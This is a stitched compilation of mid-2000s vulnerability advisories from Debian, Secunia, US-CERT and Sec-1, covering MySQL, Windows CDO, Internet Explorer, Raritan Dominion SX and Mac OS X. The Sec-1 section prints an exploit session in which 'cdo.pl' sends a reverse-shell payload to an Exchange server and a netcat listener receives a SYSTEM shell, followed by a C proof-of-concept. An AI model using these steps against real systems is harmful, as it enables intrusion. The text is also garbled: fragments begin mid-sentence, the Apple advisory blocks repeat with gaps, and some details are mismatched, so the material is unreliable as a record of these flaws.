698fd659ef265c937dd045cfb2e9e28a http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_mips.deb Size/MD5 checksum: 26338840 89c569b544aeb60ce6aae1c77d40965e mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_mipsel.deb Size/MD5 checksum: 1789510 2501eed6aaa7143a89f13e4bd9658ecf http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_mipsel.deb Size/MD5 checksum: 47718 ed3dc0fc53b78b2307dc4790ff82a174 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_mipsel.deb Size/MD5 checksum: 7640356 5417137e8b9632964ea0d67e8cd96416 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_mipsel.deb Size/MD5 checksum: 25845474 d379d4a5f900202d6244858d379aa46a http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_mipsel.deb Size/MD5 checksum: 7561164 31fa1242af6a762a92486aa327469d1f powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_powerpc.deb Size/MD5 checksum: 1832312 c6ab2b2c70aed56a7748eb0a5dd04c8c http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_powerpc.deb Size/MD5 checksum: 7573184 f43fb3a11284830b745346775073f92d http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_powerpc.deb Size/MD5 checksum: 7511850 184e9e37e760f4bb3779385d134975db http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_powerpc.deb Size/MD5 checksum: 47708 a76913df77b9f358f88a66875dc13a46 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_powerpc.deb Size/MD5 checksum: 26164462 386da660c381925416238a51b0a847a4 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_s390.deb Size/MD5 checksum: 47714 7fa0b60bff0e106f6328b0b026566008 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_s390.deb Size/MD5 checksum: 26763646 544f49b13f6207c1a104dc9eef9e6dd9 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_s390.deb Size/MD5 checksum: 7413442 b70c6184c3b82ead175debdd569ab807 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_s390.deb Size/MD5 checksum: 7507380 f9cecc1ace4fd2455516986637490930 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_s390.deb Size/MD5 checksum: 1951732 d5eaad746a8db92889febd0da68f1ae5 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_sparc.deb Size/MD5 checksum: 7153228 566328488d67a3843b04689d76f0253d http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_sparc.deb Size/MD5 checksum: 47714 551a6f9a790b301d63c856ecab13be75 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_sparc.deb Size/MD5 checksum: 7013384 3915c6846d5ffce6e321b7e40006cb66 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_sparc.deb Size/MD5 checksum: 1797430 b0bd228090c8923d08c9b8ee84a1edb8 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_sparc.deb Size/MD5 checksum: 25425084 a9934459b8cde72354ffc463b2ec140f These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHnjjKXm3vHE4uyloRApi/AKCLKlM616TTchb0zEQ8K4cOCdgZhwCffa1J oQ57J3yhzeNDDwqXdxLvhxM= =6ogr -----END PGP SIGNATURE-----

Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library. ---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: Internet Explorer "javaprxy.dll" Memory Corruption Vulnerability SECUNIA ADVISORY ID: SA15891 VERIFY ADVISORY: http://secunia.com/advisories/15891/ CRITICAL: Highly critical IMPACT: DoS, System access WHERE: >From remote SOFTWARE: Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/ DESCRIPTION: SEC Consult has reported a vulnerability in Microsoft Internet Explorer, which potentially can be exploited by malicious people to compromise a user's system. This can be exploited via a malicious web site to cause a memory corruption. The vulnerability has been reported in versions 5.01, 5.5, and 6.0. SOLUTION: The vendor recommends setting Internet and Local intranet security zone settings to "High". PROVIDED AND/OR DISCOVERED BY: sk0L and Martin Eiszner, SEC Consult. ORIGINAL ADVISORY: Microsoft: http://www.microsoft.com/technet/security/advisory/903144.mspx SEC Consult: http://www.sec-consult.com/184.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . SEC-1 LTD. The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable. The vulnerability can be exploited by crafting an e-mail with a large header name such as "Content-Type<LARGE STRING>:". A failure to correctly determine the length of the string results in a stack overflow. Under certain conditions the vulnerability can also be used to bypass content security mechanisms such as virus and content security scanners. Proof of concept code to recreate the problem is included at the bottom of this advisory. Exploit Availability: Sec-1 do not release exploit code to the general public. Attendees of the Sec-1 Applied Hacking & Intrusion prevention course will receive a copy of this exploit as part of the Sec-1 Exploit Arsenal. See: http://www.sec-1.com/applied_hacking_course.html Exploit Example: [root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53 Enter IP address of your attacking host: 10.0.0.200 Enter Port for shellcode to connect back on: 80 [*]----Connected OK! [*]----Sending MAIL FROM: me@test.com [*]----Sending RCPT TO: <me@test.com> [*]----Sending Malformed E-mail body [*]----Shellcode Length: 316 [*]----Shellcode type: Reverse shell [*]----Done. [!] Note this may take a while. Inetinfo will crash and restart This will happen until a nops are reached. You may also want to clear the queue to restore Inetinfo.exe by deleting malformed e-mail from c:\Inetpub\mailroot\Queue [root@homer PoC]# nc -l -p 80 -v listening on [any] 80 ... 10.0.0.53: inverse host lookup failed: Unknown host connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>c:\whoami NT AUTHORITY\SYSTEM C:\WINNT\system32> Vendor Response: Microsoft have released the following information including a fix, http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CAN-2005-1987 Demonstration: The following CDO code demonstrates the problem. Step 1. Create an E-mail named vuln.eml including a large "Content-Type:" header. Step 2. // Compile with -GX option #import <msado15.dll> no_namespace rename("EOF", "adoEOF") #import <cdosys.dll> rename_namespace("CDO") #include <stdio.h> int main() { CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush(); for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; } } catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); } CoUninitialize(); return 0; } CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; Copyright 2005 Sec-1 LTD. All rights reserved. ************************************************************** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html ************************************************************** . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Technical Cyber Security Alert TA05-284A Microsoft Windows, Internet Explorer, and Exchange Server Vulnerabilities Original release date: October 11, 2005 Last revised: -- Source: US-CERT Systems Affected * Microsoft Windows * Microsoft Internet Explorer * Microsoft Exchange Server For more complete information, refer to the Microsoft Security Bulletin Summary for October 2005. Overview Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server. I. Description Microsoft Security Bulletins for October 2005 address vulnerabilities in Windows and Internet Explorer. Further information is available in the following US-CERT Vulnerability Notes: VU#214572 - Microsoft Plug and Play fails to properly validate user supplied data Microsoft Plug and Play contains a flaw in the handling of message buffers that may result in local or remote arbitrary code execution or denial-of-service conditions. (CAN-2005-1987) VU#922708 - Microsoft Windows Shell fails to handle shortcut files properly Microsoft Windows Shell does not properly handle some shortcut files and may permit arbitrary code execution when a specially-crafted file is opened. (CAN-2005-0163) II. An attacker may also be able to cause a denial of service. III. Solution Apply Updates Microsoft has provided the updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site. Workarounds Please see the following US-CERT Vulnerability Notes for workarounds. Appendix A. References * Microsoft Security Bulletin Summary for October 2005 - <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx> * US-CERT Vulnerability Note VU#214572 - <http://www.kb.cert.org/vuls/id/214572> * US-CERT Vulnerability Note VU#883460 - <http://www.kb.cert.org/vuls/id/883460> * US-CERT Vulnerability Note VU#922708 - <http://www.kb.cert.org/vuls/id/922708> * US-CERT Vulnerability Note VU#995220 - <http://www.kb.cert.org/vuls/id/995220> * US-CERT Vulnerability Note VU#180868 - <http://www.kb.cert.org/vuls/id/180868> * US-CERT Vulnerability Note VU#950516 - <http://www.kb.cert.org/vuls/id/950516> * US-CERT Vulnerability Note VU#959049 - <http://www.kb.cert.org/vuls/id/959049> * US-CERT Vulnerability Note VU#680526 - <http://www.kb.cert.org/vuls/id/680526> * CAN-2005-2120 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120> * CAN-2005-1987 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987> * CAN-2005-2122 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122> * CAN-2005-2128 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128> * CAN-2005-2119 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119> * CAN-2005-1978 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978> * CAN-2005-2127 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127> * CAN-2005-0163 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163> * Microsoft Update - <https://update.microsoft.com/microsoftupdate> _________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA05-284A.html> _________________________________________________________________ Feedback can be directed to US-CERT. Please send email to: <cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject. _________________________________________________________________ Revision History Oct 11, 2004: Initial release _________________________________________________________________ Produced 2005 by US-CERT, a government organization. Terms of use <http://www.us-cert.gov/legal.html> _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/>. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c 1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe /9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog== =5hXu -----END PGP SIGNATURE-----

Cisco IOS 12.2T through 12.4 allows remote attackers to bypass Authentication, Authorization, and Accounting (AAA) RADIUS authentication, if the fallback method is set to none, via a long username. A remote attacker may exploit this issue to bypass authentication and gain unauthorized access to the affected service. Cisco IOS is the underlying system used by Cisco devices

Raritan Dominion SX (DSX) Console Servers DSX16, DSX32, DSX4, DSX8, and DSXA-48 set (1) world-readable permissions for /etc/shadow and (2) world-writable permissions for /bin/busybox, which allows local users to obtain hashed passwords or execute arbitrary code as other users. Raritan Dominion SX is reportedly prone to multiple vulnerabilities. Reportedly, the server contains two default accounts that are not protected with a password. This can allow a remote attacker to gain unauthorized access to the server. Another issue can allow an attacker to potentially gain elevated privileges on an affected computer as the shadow password file is world readable. Raritan Dominion SX16, SX32, SX4, SX8, and SXA-48 are reportedly vulnerable. The researcher responsible for reporting these issues has stated that DSX32 running firmware version 2.4.6 was tested and is vulnerable to these issues. This BID will be updated when more details are available. Raritan Dominion SX Console Server is a set of serial device management software. Raritan Dominion SX (DSX) Console Servers DSX16, DSX32, DSX4, DSX8, and DSXA-48 have weak security mechanisms. ---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: Dominion SX Insecure File Permission Security Issues SECUNIA ADVISORY ID: SA15853 VERIFY ADVISORY: http://secunia.com/advisories/15853/ CRITICAL: Less critical IMPACT: Manipulation of data, Exposure of sensitive information WHERE: Local system OPERATING SYSTEM: Dominion SX http://secunia.com/product/5300/ DESCRIPTION: Dirk Wetter has reported two security issues in Dominion SX, which can be exploited by malicious, local users to disclose sensitive information, cause a DoS (Denial of Service), and potentially gain escalated privileges. 1) The default file permission of "/etc/shadow" is set to world-readable, which makes it possible to gain knowledge of the root user's password hash. 2) The default file permission of "/bin/busybox" is set to world-writable. This can be exploited to move or delete the file and potentially execute arbitrary code with another user's privileges by replacing it with a malicious file. The security issues have been reported in DSX4, DSX8, DSX16, DSX32, and DSXA-48. SOLUTION: Apply updated firmware. http://www.raritan.com/support/sup_upgrades.aspx PROVIDED AND/OR DISCOVERED BY: Dirk Wetter ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Safari after 2.0 in Apple Mac OS X 10.3.9 allows remote attackers to bypass domain restrictions via crafted web archives that cause Safari to render them as if they came from a different site. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. Safari is Apple's Safari web browser compatible with Microsoft Windows operating system. 1) A boundary error in ImageIO can be exploited to cause a buffer overflow and may allow execution of arbitrary code on a user's system when a specially crafted GIF file is opened e.g. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

The Java extensions for QuickTime 6.52 and earlier in Apple Mac OS X 10.3.9 allow untrusted applets to call arbitrary functions in system libraries, which allows remote attackers to execute arbitrary code. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. Mac OS is an operating system running on Apple Macintosh series computers. 1) A boundary error in ImageIO can be exploited to cause a buffer overflow and may allow execution of arbitrary code on a user's system when a specially crafted GIF file is opened e.g. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

Buffer overflow in ImageIO for Apple Mac OS X 10.4.2, as used by applications such as WebCore and Safari, allows remote attackers to execute arbitrary code via a crafted GIF file. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. in WebCore or Safari. 2) An error in Mail.app when processing auto-reply rules can cause an automatically generated response message to include a plain-text copy of the encrypted message. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerability is caused due to an unspecified error in the XMLRPC module, which may be exploited to execute arbitrary commands on a vulnerable XMLRPC server. The vulnerability has been reported in version 1.8.2. Prior versions may also be affected. SOLUTION: The vulnerability has been fixed in the CVS repository

Mail.app in Mail for Apple Mac OS X 10.3.9 and 10.4.2 includes message contents when using auto-reply rules, which could cause Mail.app to include decrypted message contents for encrypted messages. Ruby includes a vulnerable default value that may be used to bypass security restrictions and execute arbitrary code. Apple Mac OS X QuickDraw Manager contains a buffer overflow that may allow a remote attacker to execute arbitrary code. Two vulnerabilities in Mail resulting in information disclosure. A local privilege escalation vulnerability in malloc. This issue has been split into BID 14939. An arbitrary code execution vulnerability in QuickDraw Manager. A privilege escalation vulnerability in QuickTime for Java. A cross-site scripting vulnerability in Safari. An unauthorized access vulnerability in SecurityAgent. A privilege escalation vulnerability in securityd. Mac OS is an operating system running on Apple Macintosh series computers. 1) A boundary error in ImageIO can be exploited to cause a buffer overflow and may allow execution of arbitrary code on a user's system when a specially crafted GIF file is opened e.g. in WebCore or Safari. This may disclose certain sensitive information. 3) An error in Mail.app when using Kerberos 5 for SMTP authentication can cause un-initialized memory to be appended to a message. This may disclose certain sensitive information. For more information: SA16449 4) "malloc" creates diagnostic files insecurely when certain environmental variables are set to enable debugging of application memory allocation. This can be exploited by malicious, local users to create or overwrite arbitrary files. from Safari, Mail, or Finder. 6) A validation error in the Java extensions bundled with QuickTime 6.52 and earlier can be exploited by untrusted applets to call arbitrary functions from system libraries. Systems with QuickTime 7 or later, or Mac OS X v10.4 or later, are not affected. Systems prior to Mac OS X v10.4 are not affected. For more information: SA15767 8) A validation error in Safari when rendering web archives from a malicious site can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of another site. For more information: SA16449 9) An error in the SecurityAgent may cause the "Switch User..." button to be displayed even when the "Enable fast user switching" setting has been disabled. This may allow malicious, local users to access the current user's desktop without authentication even when the "Require password to wake this computer from sleep or screen saver" setting is enabled. 10) A validation error in the Authorization Services "securityd" allows unprivileged users to gain certain privileges that should be restricted to administrative users. This can be exploited by malicious, local users to gain escalated privileges. SOLUTION: Apply Security Update 2005-008. Mac OS X 10.3.9: http://www.apple.com/support/downloads/securityupdate2005008macosx1039.html Mac OS X 10.4.2: http://www.apple.com/support/downloads/securityupdate2005008macosx1042.html PROVIDED AND/OR DISCOVERED BY: 2) Norbert Rittel, Rittel Consulting 3) MIT Kerberos Team 4) Ilja van Sprundel, Suresec LTD 5) Henrik Dalgaard, Echo One 6) Dino Dai Zovi 9) Luke Fowler, Indiana University Global Research Network Operations Center ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=302413 OTHER REFERENCES: SA15767: http://secunia.com/advisories/15767/ SA16449: http://secunia.com/advisories/16449/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the 